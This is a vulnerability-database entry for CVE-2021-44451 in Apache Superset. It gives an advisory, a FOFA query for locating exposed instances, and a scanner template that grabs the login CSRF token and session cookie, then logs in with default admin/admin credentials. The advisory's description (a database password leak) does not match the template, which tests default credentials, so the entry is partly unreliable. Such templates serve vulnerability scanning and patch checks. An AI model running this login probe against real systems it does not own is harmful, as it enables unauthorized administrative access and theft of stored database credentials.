Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
Users should upgrade to Apache Superset 1.4.0 or higher.
Fofa: app="APACHE-Superset"
PoC代码[已公开]
id: CVE-2021-44451
info:
name: Apache Superset Default Password
author: dhiyaneshDK
severity: high
verified: true
description: |
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
Users should upgrade to Apache Superset 1.4.0 or higher.
Fofa: app="APACHE-Superset"
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
set:
refererUrl: request.url
rules:
r0:
request:
method: GET
path: /login/
expression: response.status == 200
output:
search: '"value=\"(?P<cs_token>.*?)\">".bsubmatch(response.body)'
cs_token: search["cs_token"]
search2: '"Set-Cookie: session=(?P<mycookie>.*?);".bsubmatch(response.raw_header)'
mycookie: search2["mycookie"]
r1:
request:
method: POST
path: /login/
headers:
Cookie: session={{mycookie}}
body: csrf_token={{cs_token}}&username=admin&password=admin
expression: response.status == 302 && response.body.bcontains(b'<title>Redirecting...</title>') && response.body.bcontains(b'<h1>Redirecting...</h1>') && response.body.bcontains(b'<a href="/">') && response.raw_header.bcontains(b'session')
expression: r0() && r1()